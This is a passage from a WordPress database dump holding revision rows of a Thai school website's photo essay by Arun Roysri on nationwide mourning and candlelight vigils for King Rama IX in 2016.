บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:29:47', '2018-11-12 07:29:47', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4390, 3, '2018-11-12 14:31:38', '2018-11-12 07:31:38', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large alignright\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<p class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:31:38', '2018-11-12 07:31:38', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4391, 3, '2018-11-12 14:33:11', '2018-11-12 07:33:11', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" 